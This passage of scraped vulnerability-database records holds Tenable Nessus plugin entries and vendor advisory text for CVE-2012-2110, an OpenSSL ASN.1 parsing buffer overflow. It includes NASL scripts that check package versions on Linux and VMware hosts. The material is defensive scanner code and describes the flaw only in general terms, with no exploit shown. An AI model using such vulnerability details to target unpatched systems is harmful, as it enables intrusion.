using memory-based ASN.1 functions (e.g.,\n'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM\nfunctions.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120419.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/changelog.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2012/Apr/210\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 1.0.1a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-2110\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\", \"openssl_nix_installed.nbin\", \"openssl_win_installed.nbin\");\n script_require_keys(\"installed_sw/OpenSSL\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_openssl.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'OpenSSL');\n\nvcf::check_all_backporting(app_info:app_info);\n\nvar constraints = [{ 'min_version' : \"1.0.1\", 'fixed_version' : '1.0.1a'}];\n\nvcf::openssl::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:45:11", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain a backported patch to resolve this issue. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : openssl on SL5.x, SL6.x i386/x86_64 (20120424)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:openssl", "p-cpe:/a:fermilab:scientific_linux:openssl-debuginfo", "p-cpe:/a:fermilab:scientific_linux:openssl-devel", "p-cpe:/a:fermilab:scientific_linux:openssl-perl", "p-cpe:/a:fermilab:scientific_linux:openssl-static", "p-cpe:/a:fermilab:scientific_linux:openssl097a", "p-cpe:/a:fermilab:scientific_linux:openssl097a-debuginfo", "p-cpe:/a:fermilab:scientific_linux:openssl098e", "p-cpe:/a:fermilab:scientific_linux:openssl098e-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120424_OPENSSL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61305);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\");\n\n script_name(english:\"Scientific Linux Security Update : openssl on SL5.x, SL6.x i386/x86_64 (20120424)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the OpenSSL library must be\nrestarted, or the system rebooted.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=2120\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b255da57\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl097a-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openssl098e-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"openssl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-debuginfo-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-devel-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl097a-0.9.7a-11.el5_8.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl097a-debuginfo-0.9.7a-11.el5_8.2\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"openssl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-debuginfo-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-devel-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl098e-0.9.8e-17.el6_2.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl098e-debuginfo-0.9.8e-17.el6_2.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:38:04", "description": "Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)", "cvss3": {}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : openssl098e (ALAS-2012-73)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl098e", "p-cpe:/a:amazon:linux:openssl098e-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-73.NASL", "href": "https://www.tenable.com/plugins/nessus/69680", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-73.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69680);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_xref(name:\"ALAS\", value:\"2012-73\");\n script_xref(name:\"RHSA\", value:\"2012:0518\");\n\n script_name(english:\"Amazon Linux AMI : openssl098e (ALAS-2012-73)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-73.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update openssl098e' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl098e-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl098e-0.9.8e-17.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl098e-debuginfo-0.9.8e-17.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl098e / openssl098e-debuginfo\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:30:19", "description": "Description of changes:\n\n[0.9.7a-43.18.0.1]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185) backport of OL5 patch 0.9.7a-11.2 by Tomas Mraz <<A HREF='http://oss.oracle.com/mailman/listinfo/el-errata'>tmraz at redhat.com</A>>", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : openssl (ELSA-2012-2011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2012-2011.NASL", "href": "https://www.tenable.com/plugins/nessus/68672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2012-2011.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68672);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n\n script_name(english:\"Oracle Linux 4 : openssl (ELSA-2012-2011)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[0.9.7a-43.18.0.1]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n backport of OL5 patch 0.9.7a-11.2 by Tomas Mraz <<A HREF='http://oss.oracle.com/mailman/listinfo/el-errata'>tmraz at redhat.com</A>>\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-May/002796.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"openssl-0.9.7a-43.18.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"openssl-devel-0.9.7a-43.18.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"openssl-perl-0.9.7a-43.18.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T15:15:35", "description": "This compat-openssl097g rollup update contains various security fixes :\n\n - incorrect integer conversions in OpenSSL could have resulted in memory corruption during buffer management operations. (CVE-2012-2131 / CVE-2012-2110)", "cvss3": {}, "published": "2013-01-25T00:00:00", "type": "nessus", "title": "SuSE 11.2 Security Update : compat-openssl097g (SAT Patch Number 6749)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:compat-openssl097g", "p-cpe:/a:novell:suse_linux:11:compat-openssl097g-32bit", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_COMPAT-OPENSSL097G-120830.NASL", "href": "https://www.tenable.com/plugins/nessus/64120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64120);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n\n script_name(english:\"SuSE 11.2 Security Update : compat-openssl097g (SAT Patch Number 6749)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This compat-openssl097g rollup update contains various security \nfixes :\n\n - incorrect integer conversions in OpenSSL could have\n resulted in memory corruption during buffer management\n operations. (CVE-2012-2131 / CVE-2012-2110)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=758060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2110.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2131.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6749.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:compat-openssl097g\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:compat-openssl097g-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"compat-openssl097g-0.9.7g-146.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-146.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:22:39", "description": "a. VMware vCenter, ESXi and ESX NFC protocol memory corruption vulnerability\n\n VMware vCenter Server, ESXi and ESX contain a vulnerability in the handling of the Network File Copy (NFC) protocol. To exploit this vulnerability, an attacker must intercept and modify the NFC traffic between vCenter Server and the client or ESXi/ESX and the client. Exploitation of the issue may lead to code execution.\n\n To reduce the likelihood of exploitation, vSphere components should be deployed on an isolated management network\n\n VMware would like to thank Alex Chapman of Context Information Security for reporting this issue to us. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1659 to this issue.\n\nb. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\n Oracle (Sun) JRE is updated to version 1.5.0_38, which addresses multiple security issues that existed in earlier releases of Oracle (Sun) JRE. \n\n Oracle has documented the CVE identifiers that are addressed in JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update Advisory of October 2012. \n\nc. Update to ESX service console OpenSSL RPM \n\n The service console OpenSSL RPM is updated to version openssl-0.9.7a.33.28.i686 to resolve multiple security issues. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-2110 to this issue.", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "nessus", "title": "VMSA-2013-0003 : VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third-party library security issues.", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2013-1659"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:3.5", "cpe:/o:vmware:esxi:4.0", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0", "cpe:/o:vmware:esxi:5.1", "cpe:/o:vmware:esx:3.5", "cpe:/o:vmware:esx:4.0"], "id": "VMWARE_VMSA-2013-0003.NASL", "href": "https://www.tenable.com/plugins/nessus/64812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2013-0003. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64812);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2013-1659\");\n script_bugtraq_id(53158, 55501, 56025, 56033, 56039, 56043, 56046, 56051, 56054, 56055, 56056, 56057, 56058, 56059, 56061, 56063, 56065, 56066, 56067, 56068, 56070, 56071, 56072, 56075, 56076, 56078, 56079, 56080, 56081, 56082, 56083, 58115);\n script_xref(name:\"VMSA\", value:\"2013-0003\");\n\n script_name(english:\"VMSA-2013-0003 : VMware vCenter Server, ESXi and ESX address an NFC Protocol memory corruption and third-party library security issues.\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. VMware vCenter, ESXi and ESX NFC protocol memory corruption\n vulnerability\n\n VMware vCenter Server, ESXi and ESX contain a vulnerability in the\n handling of the Network File Copy (NFC) protocol. To exploit this\n vulnerability, an attacker must intercept and modify the NFC \n traffic between vCenter Server and the client or ESXi/ESX and the\n client. Exploitation of the issue may lead to code execution.\n\n To reduce the likelihood of exploitation, vSphere components should\n be deployed on an isolated management network\n\n VMware would like to thank Alex Chapman of Context Information\n Security for reporting this issue to us. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2013-1659 to this issue.\n\nb. VirtualCenter, ESX and ESXi Oracle (Sun) JRE update 1.5.0_38\n\n Oracle (Sun) 